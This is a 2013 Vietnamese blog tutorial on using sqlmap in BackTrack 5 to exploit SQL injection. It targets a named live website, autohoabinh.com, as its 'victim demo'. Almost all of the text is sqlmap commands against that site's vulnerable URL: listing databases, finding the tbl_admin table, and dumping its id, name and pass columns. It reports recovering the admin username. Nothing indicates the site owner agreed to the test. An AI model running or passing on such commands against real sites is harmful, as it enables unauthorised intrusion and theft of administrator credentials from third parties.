Chủ Nhật, 10 tháng 3, 2013

SQLi dùng bộ sqlmap trong backtrack 5

Lần trước đã có bài check sqli bằng bộ công cụ Darkmysql,hôm nay capuchino trình bày check sqli bằng bộ công cụ sqlmap trong backtrack 5 .Victim demo vẫn là autohoabinh.com nhé.
link lỗi sqli  http://autohoabinh.com/?page=products_detail&id=296&catid=2'
Vào thư mục chưa bộ công cụ sqlmap
cd /pentest/database/sqlmap/

đầu tiên ta get database nhé

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" --dbs

ở đây --dbs là databases
thêm 1 số cái nữa như

--dbs                DBMS databases
--tables             DBMS database tables
 --columns         DBMS database table columns
 --schema          DBMS schema
 --dump             dump dữ liệu

'


Database nhận đc  là athb_db nhé.
tiếp tục ta get các table như sau
python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db --tables


table tbl_admin là table chúng ta cần khai thác đúng hok nào,giờ ta lấy các column nhé

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin --columns


kết quả nhận đc như sau


bây giờ ta sẽ dump các trường id,name và pass nhé.
ta dump trường id trước nào 

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin -C id --dump



kết quả nhận đc là id ->1

tương tự ta dump các trường còn lại 

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin -C name --dump


kết quả nhận đc thì user là admin nhé

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin -C pass --dump


dump đc pass là khoản trắng!!!hic..là sao ta.ko có pass hả ta :)) hay là nó ẩn ta.Cơ mà ko sao,biết cách làm là đc ùi,hihi [vì mới thử lại bằng darkmysql cũng nhận đc là khoảng trắng :)) ]

tut by capuchino




Không có nhận xét nào:

Đăng nhận xét